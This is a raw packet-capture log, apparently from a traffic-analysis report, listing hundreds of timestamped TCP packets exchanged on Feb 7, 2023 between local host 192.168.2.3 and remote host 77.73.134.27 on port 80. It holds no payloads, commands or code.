                                                                                    Feb 7, 2023 19:44:56.906574965 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906588078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906608105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906620979 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906635046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906656981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906660080 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906687975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906702042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906702042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906728983 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906747103 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906770945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906779051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906795979 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906820059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906822920 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906842947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906846046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906872988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906873941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906888962 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906898975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906923056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906924963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906949043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906958103 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906974077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.906992912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906992912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.906999111 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907023907 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907032013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907051086 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907051086 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907073021 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907077074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907103062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907103062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907125950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907130957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907157898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907159090 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907180071 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907185078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907210112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907210112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907236099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907237053 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907260895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907270908 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907286882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907288074 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907309055 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907314062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907336950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907339096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907365084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907367945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907391071 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907392025 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907417059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907418013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907444000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907444954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907468081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907469988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907495975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907497883 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907521009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907529116 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907543898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907551050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907576084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907577991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907598019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907602072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907628059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907628059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907649994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907653093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907679081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907680988 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907701969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907704115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907732010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907736063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907752037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907757044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907782078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907784939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907799959 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907808065 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907834053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907835960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907855034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907859087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907885075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907886982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907907009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907910109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907937050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907938004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907953978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.907962084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907987118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.907988071 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908008099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908013105 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908037901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908041954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908065081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908066034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908086061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908092022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908118010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908118010 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908140898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908143044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908168077 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908169031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908195019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908198118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908217907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908220053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908246040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908248901 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908266068 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908272028 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908297062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908298969 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908322096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908323050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908349037 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908349991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908368111 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908374071 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908400059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908401012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908421040 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908427000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908452034 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908452988 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908476114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908477068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908504009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908504009 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908531904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908534050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908559084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908562899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908584118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908584118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908611059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908612013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908629894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908636093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908662081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908663034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908687115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908693075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908713102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908714056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908739090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908744097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908761024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908766985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908793926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908795118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908813953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908821106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908847094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908848047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908868074 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908873081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908898115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908898115 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908925056 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908925056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908947945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908951044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.908974886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.908977032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909003019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909003019 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909029007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909030914 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909049988 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909054995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909080982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909080982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909099102 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909106970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909132004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909133911 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909152985 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909158945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909183025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909194946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909220934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909221888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909240961 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909248114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909272909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909277916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909296036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909301043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909327984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909328938 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909348011 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909387112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909398079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909425020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909450054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909451008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909478903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909480095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909506083 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909508944 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909532070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909533978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909559011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909560919 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909584999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909589052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909611940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909616947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909636974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909638882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909666061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909668922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909692049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909698009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909717083 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909718990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909744978 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909746885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909774065 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909775019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909812927 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909815073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909835100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909840107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909856081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909872055 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909877062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909888983 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909897089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909904003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909918070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909938097 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909944057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909944057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909959078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909965992 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.909981966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.909986973 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910003901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910007000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910026073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910034895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910047054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910052061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910069942 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910087109 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910090923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910103083 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910113096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910115957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910135984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910145044 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910156965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910162926 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910178900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910180092 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910200119 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910211086 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910223007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910237074 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910245895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910254002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910267115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910274982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910290003 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910295010 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910311937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910322905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910331964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910342932 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910352945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910358906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910375118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910388947 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910397053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910403967 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910417080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910418987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910439968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910450935 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910459995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910465002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910480022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910481930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910501957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910511971 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910522938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910527945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910542965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910556078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910563946 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910573006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910587072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910589933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910608053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910619974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910629988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910634995 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910650969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910661936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910671949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910680056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910705090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910705090 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910725117 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910728931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910749912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910765886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910769939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910784006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910790920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910799980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.910814047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.910834074 CET804969877.73.134.27192.168.2.3
